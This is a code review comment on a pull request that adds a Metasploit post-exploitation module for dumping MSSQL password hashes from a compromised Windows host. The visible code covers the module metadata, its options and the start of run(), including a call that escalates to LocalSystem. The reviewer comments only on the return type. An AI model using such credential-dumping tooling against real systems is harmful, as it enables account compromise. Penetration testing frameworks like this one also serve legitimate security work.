modules/post/windows/manage/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,430 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+require 'rex/proto/rfb'
+
+
+class Metasploit3 < Msf::Post
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::UserProfiles
+
+  VERSION_5 = Gem::Version.new('5.0')
+  VERSION_6 = Gem::Version.new('6.0')
+  VERSION_8 = Gem::Version.new('8.0')
+  VERSION_9 = Gem::Version.new('9.0')
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Local SQL Server Password Hashes Dump',
+        'Description'   => %q{ This module extracts the usernames and password
+        hashes from a MSSQL server and stores them in the loot using the
+        same technique in mssql_local_auth_bypass (Credits: Scott Sutherland)
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Mike Manzotti <mike.manzotti[at]dionach.com>'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+
+    register_options(
+      [
+        OptString.new('INSTANCE',  [false, 'Name of target SQL Server instance', '']),
+      ], self.class)
+  end
+
+  def run
+
+    # Set verbosity level
+    verbose = datastore['VERBOSE'].to_s.downcase
+
+    # Set instance name (if specified)
+    instance = datastore['INSTANCE'].to_s.upcase
+
+    # Display target
+    print_status("Running module against #{sysinfo['Computer']}")
+
+    # Get LocalSystem privileges
+    system_status = givemesystem
+    if system_status[0]
```

Comment:
`givemesystem` returns `0` or `1`, correct? If so, how come you're checking `system_status[0]`? This doesn't make sense. `givemesystem` should probably just return a boolean. the check can then simply be:

``` ruby
if givemesystem
  ...
```